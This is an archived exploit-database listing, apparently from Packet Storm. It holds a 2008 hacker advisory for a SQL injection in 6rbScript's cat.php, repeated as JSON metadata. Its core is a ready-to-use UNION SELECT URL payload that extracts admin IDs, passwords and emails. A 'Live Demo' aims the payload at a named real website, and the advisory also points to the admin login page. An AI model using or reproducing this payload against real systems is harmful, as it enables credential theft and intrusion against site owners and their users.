Search...

6rbscriptcat-sql.txt

2008-09-22T00:00:00

ID PACKETSTORM:70218
Type packetstorm
Reporter Karar alShaMi
Modified 2008-09-22T00:00:00

Description

                                        
                                            `$___________________________________________________/  
$  
$ 6rbScript (cat.php) Remote SQL Injection  
$  
$___________________________________________________/  
$ -- K --  
$  
$ Author:\ Karar_alshami   
$  
$ Home:\ Google.Com  
$  
$ email:\ Karar_alshame{aT}Yahoo{d0t}com  
$  
$  
$  
$___________________________________________________/  
$ -- K --  
$  
$ script :\ www.6rbscript.com  
$   
$ Price! :\ 150$  
$  
$ DorK :\ "Try 2 Find it!"  
$___________________________________________________/  
  
  
Exploit:\  
------------  
  
WwW..[localhost].com/script/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors--  
  
  
Live Demo:\  
-----------------  
  
http://www.qatarw.com/A/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors--  
  
  
Admin LoGin :\  
--------------------  
  
WwW.[localhost].com/admin  
  
  
  
  
  
____________________________-- Greetz --_________________________________/  
$  
$ All members 0f Mriraq.com/vb & www.iq-ty.com/vb   
$  
$ All my frienDs & $ Hussin X $ S_DLA_S Th3 1r4Q1 $ GeNiUs IrAQI $ Fakar ali $   
$   
$ Bashar $ Iraqhack $ mos_chori  
$   
$ h3 h3  
$______________________________----____________________________________/  
  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:70218", "type": "packetstorm", "bulletinFamily": "exploit", "title": "6rbscriptcat-sql.txt", "description": "", "published": "2008-09-22T00:00:00", "modified": "2008-09-22T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/70218/6rbscriptcat-sql.txt.html", "reporter": "Karar alShaMi", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:17:44", "viewCount": 2, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:17:44", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:44", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/70218/6rbscriptcat-sql.txt", "sourceData": "`$___________________________________________________/ \n$ \n$ 6rbScript (cat.php) Remote SQL Injection \n$ \n$___________________________________________________/ \n$ -- K -- \n$ \n$ Author:\\ Karar_alshami \n$ \n$ Home:\\ Google.Com \n$ \n$ email:\\ Karar_alshame{aT}Yahoo{d0t}com \n$ \n$ \n$ \n$___________________________________________________/ \n$ -- K -- \n$ \n$ script :\\ www.6rbscript.com \n$ \n$ Price! :\\ 150$ \n$ \n$ DorK :\\ \"Try 2 Find it!\" \n$___________________________________________________/ \n \n \nExploit:\\ \n------------ \n \nWwW..[localhost].com/script/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors-- \n \n \nLive Demo:\\ \n----------------- \n \nhttp://www.qatarw.com/A/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors-- \n \n \nAdmin LoGin :\\ \n-------------------- \n \nWwW.[localhost].com/admin \n \n \n \n \n \n____________________________-- Greetz --_________________________________/ \n$ \n$ All members 0f Mriraq.com/vb & www.iq-ty.com/vb \n$ \n$ All my frienDs & $ Hussin X $ S_DLA_S Th3 1r4Q1 $ GeNiUs IrAQI $ Fakar ali $ \n$ \n$ Bashar $ Iraqhack $ mos_chori \n$ \n$ h3 h3 \n$______________________________----____________________________________/ \n \n \n`\n"}